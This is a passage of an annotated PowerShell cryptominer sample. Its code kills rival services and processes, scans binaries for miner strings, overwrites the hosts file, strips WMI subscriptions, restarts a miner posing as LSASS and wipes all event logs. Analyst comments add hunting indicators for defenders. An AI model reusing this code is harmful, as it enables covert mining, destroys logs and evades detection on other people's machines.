$SrvPath = $($Srv.PathName) if (($SrvName -Eq "WebClient") -Or ($SrvName -Eq "XLNXService") -Or ($SrvName -Eq "XLServicePlatform") -Or ($SrvName -Eq "QQLiveService") -Or ($SrvName -Eq "TmSvc")) { continue } if (($SrvPath -NotMatch " -k $SrvName$") -And ($SrvPath -NotMatch " -k `"$SrvName`"$")) { continue } Write-Host "[K] $SrvPId`t$SrvName`t$SrvPath" if ($SrvPId -Ne 0) { Get-Process -Id $SrvPId -EA 0 | Stop-Process -Force } $Null = $Srv.ChangeStartMode('Disabled') $Null = $Srv.StopService() $Null = $Srv.Delete() } } $SrvArray = Get-WmiObject -Class Win32_Service | Where-Object { (( $_.Name -Eq "FastUserSwitchingCompatibility" ) -Or ( $_.Name -Eq "Ias" ) -Or ( $_.Name -Eq "Irmon" ) -Or ( $_.Name -Eq "Nla" ) -Or ( $_.Name -Eq "Ntmssvc" ) -Or ( $_.Name -Eq "Wmi" )) -And ($_.DisplayName.Length -Eq 8) } if ($SrvArray -Ne $Null) { foreach ($Srv in $SrvArray) { $SrvPId = $($Srv.ProcessId) $SrvName = $($Srv.Name) $SrvPath = $($Srv.PathName) if ($SrvPath -NotMatch " -k netsvcs") { continue } Write-Host "[K] $SrvPId`t$SrvName`t$SrvPath" if ($SrvPId -Ne 0) { Get-Process -Id $SrvPId -EA 0 | Stop-Process -Force } $Null = $Srv.ChangeStartMode('Disabled') $Null = $Srv.StopService() $Null = $Srv.Delete() } } }
<# WMI_Scanner: reads the image file of every running process into memory
   (Get-Content -ReadCount 0) and regex-matches it against strings
   associated with miners and packers (XMRig, stratum+tcp://, cryptonight,
   UPX!, .vmp0, .aspack, a few domains). Matching processes are terminated
   and their files queued for WMI_DeleteFile. Two exceptions: UPX/ASPack
   hits are acted on only when the file sits under the Windows directory
   or a "Program Files (x86)\360*" folder, and MakeSureDirectoryPathExists
   hits are skipped for QCloud paths and for files with a non-empty
   CompanyName (unless FileDescription mentions StuDormMS).
   Hunt: one PowerShell process opening the image of every running process
   for read is itself a strong signal in file-access telemetry, and it
   produces a burst of disk I/O. #>
Function WMI_Scanner() { $PS = Get-WmiObject -Class Win32_Process if ($PS -ne $Null) { $PathArray = @() $Flags = "XMRig","\x00\x58\x00\x4D\x00\x52\x00\x69\x00\x67","stratum+tcp://","cryptonight","nicehash","\u940f\u626e\u553a\u942d\u5938\u7b1f","\u65e5\u4f60\u5988","UPX!","AdobeART","hra%u.dll","FuckShieldRefreshMutex","%c%c%c%c%c.exe","g1fd","ddos.tf","win%ca%cb%cd.exe","luoxkexp.com","xmrtor","BWebCam.dll","MakeSureDirectoryPathExists",".vmp0","hognoob.se",".aspack" foreach ($m in $PS) { $Path = $($m.Path) $EvId = $($m.ProcessId) if (($Path -eq $Null) -Or ($EvId -eq $PId) -Or ($EvId -eq $mPId)) { continue } $Bin = Get-Content -Path $Path -ReadCount 0 -Force -EA 0 if ($Bin -eq $Null) { continue } foreach ($Key in $Flags) { if ($Bin -Match $Key) { if (($Key -Eq "UPX!") -Or 
($Key -Eq ".aspack")) { if (($Path -NotLike "$Env:WinDir\*") -And ($Path -NotLike "*:\Program Files (x86)\360*")) { continue } } elseif ($Key -Eq "MakeSureDirectoryPathExists") { $VerInfo = Get-Item $Path -Force -EA 0 | Select-Object -ExpandProperty VersionInfo if ($Path -Match "QCloud") { continue } if (($VerInfo.CompanyName -Ne "") -And ($VerInfo.CompanyName -Ne $Null) -And ($VerInfo.FileDescription -NotLike "*StuDormMS*")) { continue } } Write-Host "[K] $EvId`t$Path`t$Key" $Null = $m.Terminate() if ($PathArray -NotContains $Path) { $PathArray+=$Path } break } } $Bin = $Null } WMI_DeleteFile($PathArray) } }
<# WMI_CheckFile: checks that the running copy at $InstallPath claims
   FileDescription "Local Security Authority Process" (the description of
   the genuine LSASS). If not, it is treated as a foreign file: its
   processes are terminated and the file removed (30 retries). If it is
   the expected file, the global mPId is re-synchronised to the live PID. #>
Function WMI_CheckFile { $Test = Get-WmiObject -Class Win32_Process | Where-Object {($_.Name -eq $FileName) -And ($_.Path -eq $InstallPath)} if ($Test -Ne $Null) { $VerInfo = Get-Item $InstallPath -Force -EA 0 | Select-Object -ExpandProperty VersionInfo if ($VerInfo.FileDescription -Ne "Local Security Authority Process") { Write-Host "[-] Error File: $InstallPath" foreach ($t in $Test) { $ProcessId = $($t.ProcessId) Write-Host "[i] Error Process Id: $ProcessId" $Null = $t.Terminate() } for ($i=0; $i -lt 30; $i++) { Remove-Item $InstallPath -Force -EA 0 if (Test-Path $InstallPath) { Start-Sleep -Milliseconds 100 } else { break } } } else { $ProcessId = $($Test.ProcessId) if ($mPId -Ne $ProcessId) { $Global:mPId = $($Test.ProcessId) Write-Host "[*] Fix Process Id to $mPId" } } } }
<# WMI_CheckHosts: if the hosts file mentions rival pools (mineXMR,
   SupportXMR, NanoPool, F2Pool) it is REPLACED wholesale with entries
   mapping the listed rival-miner domains to 0.7.4.8, discarding any
   legitimate entries that were there.
   Hunt: hosts file written by powershell.exe; hosts entries resolving
   to 0.7.4.8. The domains below are IoCs of competing campaigns. #>
Function WMI_CheckHosts { $Hosts = "$Env:WinDir\System32\Drivers\etc\hosts" $Contents = Get-Content -Path $Hosts -ReadCount 0 -Force -EA 0 if (($Contents -Match "mineXMR") -Or ($Contents -Match "SupportXMR") -Or ($Contents -Match "NanoPool") -Or ($Contents -Match "F2Pool")) { $Temp = "" $Domain = 
"xmr.usa-138.com","pool.usa-138.com","aaaa.usa-138.com","wk.ctosus.ru","down.ctosus.ru","blog.ctoscn.ru","down.9ni.top","down.sxly518.xyz","gowel.top","m4.rui2.net","owwwa.com","a46.bulehero.in","a47.bulehero.in","a88.bulehero.in","a88.heroherohero.info","fid.hognoob.se","q1a.hognoob.se","upa1.hognoob.se","upa2.hognoob.se","pxi.hognoob.se","uio.hognoob.se","uio.heroherohero.info","wk.skjsl.com","wiu.fxxxxxxk.me","aic.fxxxxxxk.me","pxx.hognoob.se","cb.fuckingmy.life","aj.0x0x0x0x0.best","fky.dfg45dfg45.best","down.us-hack.ru","down.halloo.ru","pool.us-hack.ru","auth.to0ls.com","mail.to0ls.com","update.7h4uk.com","heronoob.eu","playapp12.com","185.193.125.38","mx.oops.best","mi.oops.best","ox.mygoodluck.best","fk.0xbdairolkoie.space","fk.0xbdairolkoie.website","fk.openyourass.icu","fk.openyourass.club" foreach ($d in $Domain) { $Temp += "0.7.4.8 $d`r`n" } Set-Content $Hosts $Temp -Force -EA 0 } }
<# WMI_ClearWmiObject: removes every permanent WMI event subscription
   (__EventFilter, CommandLineEventConsumer, __FilterToConsumerBinding in
   root\Subscription) except those named like 'PowerShell Event' -
   presumably its own persistence; deletes the AppInfo value under
   HKLM:\SYSTEM, kills scrcons.exe (the WMI script-consumer host) and
   terminates PowerShell processes whose command line carries the long
   base64 string below. That string looks like a UTF-16LE-encoded
   reflective Assembly.Load of the same HKLM:\SYSTEM AppInfo value, i.e.
   a rival fileless loader - confirm by decoding.
   Hunt: Sysmon 19/20/21 (WMI filter/consumer/binding activity);
   __EventFilter names beginning "PowerShell Event"; an AppInfo value
   directly under HKLM:\SYSTEM. #>
Function WMI_ClearWmiObject { $MatchName = 'PowerShell Event' Get-WmiObject -Namespace root\Subscription -Class __EventFilter | Where-Object {$_.Name -NotMatch $MatchName} | Remove-WmiObject Get-WmiObject -Namespace root\Subscription -Class CommandLineEventConsumer | Where-Object {$_.Name -NotMatch $MatchName} | Remove-WmiObject Get-WmiObject -Namespace root\Subscription -Class __FilterToConsumerBinding | Where-Object {$_.Filter -NotMatch $MatchName} | Remove-WmiObject if ((Get-ItemProperty HKLM:\SYSTEM).AppInfo -Ne $Null) { Remove-ItemProperty -Path HKLM:\SYSTEM -Name 'AppInfo' -EA 0 } Get-Process -Name ScrCons -EA 0 | Stop-Process -Force $Null = Get-WmiObject -Class Win32_Process | Where-Object {($_.Name -Eq "PowerShell.exe") -And ( $_.CommandLine -Like 
'*WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEwATQA6AFwAUwBZAFMAVABFAE0AKQAuAEEAcABwAEkAbgBmAG8AKQApAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABuAHUAbABsACkA*')} | Invoke-WmiMethod -Name Terminate }
<# WMI_Main: orchestration. Strips WMI subscriptions, validates the
   dropped file, rewrites hosts, runs the killers and the scanner, then
   (re)starts the payload when no process named lsass.exe with the stored
   PID or path exists, otherwise records the live PID in the WMI class.
   Finally it clears EVERY event log. That wipe leaves Security 1102 /
   System 104 "log cleared" records, often the only trace left on the host
   - forward event logs off-host so earlier activity survives. #>
Function WMI_Main { Write-Host "[i] Process Id is $mPId/$nPId" WMI_ClearWmiObject WMI_CheckFile WMI_CheckHosts WMI_KillFake WMI_KillService WMI_Killer WMI_Scanner $Test = Get-WmiObject -Class Win32_Process | Where-Object {($_.Name -Eq $FileName) -And (($_.ProcessId -Eq $mPId) -Or ($_.Path -Eq $InstallPath))} if ($Test -Eq $Null) { Write-Host "[-] Process is Not Exists" WMI_StartMiner } else { $ProcessId = $($Test.ProcessId) Write-Host "[+] Process Already Exists, Process Id is $ProcessId" $Wmi=New-Object Management.ManagementClass($WmiName) $Wmi.SetPropertyValue('mPId',$ProcessId) $Null=$Wmi.Put() } WMI_CheckFile Get-EventLog -List | ForEach-Object { Clear-EventLog $_.Log } }
<# Entry point: runs WMI_Main and prints the elapsed time. #>
$Start = Get-Date WMI_Main $End = Get-Date Write-Host -ForegroundColor Red('Processed in '+($End-$Start).TotalSeconds+' second(s)')